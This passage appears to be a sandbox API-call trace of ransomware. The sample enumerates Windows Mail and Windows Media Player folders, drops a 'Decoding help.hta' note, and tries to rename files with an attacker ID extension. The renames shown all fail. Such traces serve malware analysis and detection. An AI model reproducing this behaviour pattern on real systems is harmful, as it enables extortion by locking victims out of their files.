hFile=0x184, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x908fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x908fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.710] CloseHandle (hObject=0x184) returned 1 [0039.710] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Mail\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.710] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msoe.dll") returned -1 [0039.710] lstrlenW (lpString="msoe.dll") returned 8 [0039.710] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" [0039.710] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned 37 [0039.710] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\", lpString2="msoe.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\msoe.dll") returned="\\\\?\\C:\\Program Files\\Windows Mail\\msoe.dll" [0039.710] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\msoe.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\msoe.dll") returned="\\\\?\\C:\\Program Files\\Windows Mail\\msoe.dll" [0039.710] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\msoe.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\msoe.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Mail\\msoe.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.710] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Mail\\msoe.dll" (normalized: "c:\\program files\\windows mail\\msoe.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Mail\\msoe.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows mail\\msoe.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.721] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x908fd30 | out: lpFindFileData=0x908fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc917413, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xcc917413, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x95a52df0, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x2b4a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOERES.dll", cAlternateFileName="")) returned 1 [0039.722] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" [0039.722] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned 37 [0039.722] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Mail\\Decoding help.hta" [0039.722] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Mail\\Decoding help.hta" (normalized: "c:\\program files\\windows mail\\decoding help.hta")) returned 0x1 [0039.722] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSOERES.dll") returned -1 [0039.722] lstrlenW (lpString="MSOERES.dll") returned 11 [0039.722] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" [0039.722] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned 37 [0039.722] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\", lpString2="MSOERES.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\MSOERES.dll") returned="\\\\?\\C:\\Program Files\\Windows Mail\\MSOERES.dll" [0039.722] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\MSOERES.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\MSOERES.dll") returned="\\\\?\\C:\\Program Files\\Windows Mail\\MSOERES.dll" [0039.722] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\MSOERES.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\MSOERES.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Mail\\MSOERES.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.722] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Mail\\MSOERES.dll" (normalized: "c:\\program files\\windows mail\\msoeres.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Mail\\MSOERES.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows mail\\msoeres.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.736] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x908fd30 | out: lpFindFileData=0x908fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa70b1ea1, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa70b1ea1, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa70b1ea1, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x16c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="oeimport.dll", cAlternateFileName="")) returned 1 [0039.736] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" [0039.736] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned 37 [0039.736] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Mail\\Decoding help.hta" [0039.736] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Mail\\Decoding help.hta" (normalized: "c:\\program files\\windows mail\\decoding help.hta")) returned 0x1 [0039.736] lstrcmpiW (lpString1="Decoding help.hta", lpString2="oeimport.dll") returned -1 [0039.736] lstrlenW (lpString="oeimport.dll") returned 12 [0039.736] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" [0039.736] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned 37 [0039.736] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\", lpString2="oeimport.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\oeimport.dll") returned="\\\\?\\C:\\Program Files\\Windows Mail\\oeimport.dll" [0039.736] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\oeimport.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\oeimport.dll") returned="\\\\?\\C:\\Program Files\\Windows Mail\\oeimport.dll" [0039.737] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\oeimport.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\oeimport.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Mail\\oeimport.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.737] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Mail\\oeimport.dll" (normalized: "c:\\program files\\windows mail\\oeimport.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Mail\\oeimport.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows mail\\oeimport.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.737] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x908fd30 | out: lpFindFileData=0x908fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d1f425d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9d1f425d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9d21a3bd, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x7e000, dwReserved0=0x0, dwReserved1=0x0, cFileName="wab.exe", cAlternateFileName="")) returned 1 [0039.737] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" [0039.737] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned 37 [0039.737] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Mail\\Decoding help.hta" [0039.737] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Mail\\Decoding help.hta" (normalized: "c:\\program files\\windows mail\\decoding help.hta")) returned 0x1 [0039.737] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wab.exe") returned -1 [0039.737] lstrlenW (lpString="wab.exe") returned 7 [0039.737] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" [0039.737] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned 37 [0039.737] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\", lpString2="wab.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\wab.exe") returned="\\\\?\\C:\\Program Files\\Windows Mail\\wab.exe" [0039.737] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\wab.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\wab.exe") returned="\\\\?\\C:\\Program Files\\Windows Mail\\wab.exe" [0039.737] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\wab.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\wab.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Mail\\wab.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.737] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Mail\\wab.exe" (normalized: "c:\\program files\\windows mail\\wab.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Mail\\wab.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows mail\\wab.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.737] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x908fd30 | out: lpFindFileData=0x908fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbfa72e7a, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xbfa72e7a, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x4556f160, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x8a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wabfind.dll", cAlternateFileName="")) returned 1 [0039.737] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" [0039.737] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned 37 [0039.737] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Mail\\Decoding help.hta" [0039.737] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Mail\\Decoding help.hta" (normalized: "c:\\program files\\windows mail\\decoding help.hta")) returned 0x1 [0039.737] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wabfind.dll") returned -1 [0039.738] lstrlenW (lpString="wabfind.dll") returned 11 [0039.738] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" [0039.738] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned 37 [0039.738] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\", lpString2="wabfind.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\wabfind.dll") returned="\\\\?\\C:\\Program Files\\Windows Mail\\wabfind.dll" [0039.738] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\wabfind.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\wabfind.dll") returned="\\\\?\\C:\\Program Files\\Windows Mail\\wabfind.dll" [0039.738] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\wabfind.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\wabfind.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Mail\\wabfind.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.738] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Mail\\wabfind.dll" (normalized: "c:\\program files\\windows mail\\wabfind.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Mail\\wabfind.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows mail\\wabfind.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.738] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x908fd30 | out: lpFindFileData=0x908fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbfddedd5, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xbfddedd5, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x4556f160, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xc400, dwReserved0=0x0, dwReserved1=0x0, cFileName="wabimp.dll", cAlternateFileName="")) returned 1 [0039.738] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" [0039.738] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned 37 [0039.738] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Mail\\Decoding help.hta" [0039.738] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Mail\\Decoding help.hta" (normalized: "c:\\program files\\windows mail\\decoding help.hta")) returned 0x1 [0039.738] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wabimp.dll") returned -1 [0039.738] lstrlenW (lpString="wabimp.dll") returned 10 [0039.738] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" [0039.738] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned 37 [0039.738] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\", lpString2="wabimp.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\wabimp.dll") returned="\\\\?\\C:\\Program Files\\Windows Mail\\wabimp.dll" [0039.738] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\wabimp.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\wabimp.dll") returned="\\\\?\\C:\\Program Files\\Windows Mail\\wabimp.dll" [0039.738] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\wabimp.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\wabimp.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Mail\\wabimp.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.738] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Mail\\wabimp.dll" (normalized: "c:\\program files\\windows mail\\wabimp.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Mail\\wabimp.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows mail\\wabimp.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.762] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x908fd30 | out: lpFindFileData=0x908fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf9da906, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xbf9da906, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xfa86dfb0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x10800, dwReserved0=0x0, dwReserved1=0x0, cFileName="wabmig.exe", cAlternateFileName="")) returned 1 [0039.763] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" [0039.763] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned 37 [0039.763] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Mail\\Decoding help.hta" [0039.763] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Mail\\Decoding help.hta" (normalized: "c:\\program files\\windows mail\\decoding help.hta")) returned 0x1 [0039.763] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wabmig.exe") returned -1 [0039.763] lstrlenW (lpString="wabmig.exe") returned 10 [0039.763] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" [0039.763] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned 37 [0039.763] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\", lpString2="wabmig.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\wabmig.exe") returned="\\\\?\\C:\\Program Files\\Windows Mail\\wabmig.exe" [0039.763] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\wabmig.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\wabmig.exe") returned="\\\\?\\C:\\Program Files\\Windows Mail\\wabmig.exe" [0039.763] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\wabmig.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\wabmig.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Mail\\wabmig.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.763] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Mail\\wabmig.exe" (normalized: "c:\\program files\\windows mail\\wabmig.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Mail\\wabmig.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows mail\\wabmig.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.763] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x908fd30 | out: lpFindFileData=0x908fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc2062a1d, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xc2062a1d, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xfbe97cf0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x61600, dwReserved0=0x0, dwReserved1=0x0, cFileName="WinMail.exe", cAlternateFileName="")) returned 1 [0039.763] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" [0039.763] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned 37 [0039.763] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Mail\\Decoding help.hta" [0039.763] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Mail\\Decoding help.hta" (normalized: "c:\\program files\\windows mail\\decoding help.hta")) returned 0x1 [0039.763] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WinMail.exe") returned -1 [0039.763] lstrlenW (lpString="WinMail.exe") returned 11 [0039.763] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Mail\\*.*" [0039.763] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Mail\\*.*") returned 37 [0039.763] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\", lpString2="WinMail.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\WinMail.exe") returned="\\\\?\\C:\\Program Files\\Windows Mail\\WinMail.exe" [0039.763] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Mail\\WinMail.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\WinMail.exe") returned="\\\\?\\C:\\Program Files\\Windows Mail\\WinMail.exe" [0039.764] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\WinMail.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Mail\\WinMail.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Mail\\WinMail.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.764] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Mail\\WinMail.exe" (normalized: "c:\\program files\\windows mail\\winmail.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Mail\\WinMail.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows mail\\winmail.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.764] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x908fd30 | out: lpFindFileData=0x908fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc2062a1d, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xc2062a1d, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xfbe97cf0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x61600, dwReserved0=0x0, dwReserved1=0x0, cFileName="WinMail.exe", cAlternateFileName="")) returned 0 [0039.764] FindClose (in: hFindFile=0x5a5570 | out: hFindFile=0x5a5570) returned 1 Thread: id = 94 os_tid = 0xbac [0039.697] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*", lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ead9a68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52f0 [0039.698] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.698] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ead9a68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.698] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.698] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.698] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x21ccca7f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0039.698] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0039.698] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0039.698] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0039.698] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*" [0039.698] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\*.*") returned 45 [0039.698] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US" [0039.698] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" [0039.698] GlobalMemoryStatus (in: lpBuffer=0x91cfd10 | out: lpBuffer=0x91cfd10) [0039.698] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f30ee8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x134 [0039.706] CloseHandle (hObject=0x134) returned 1 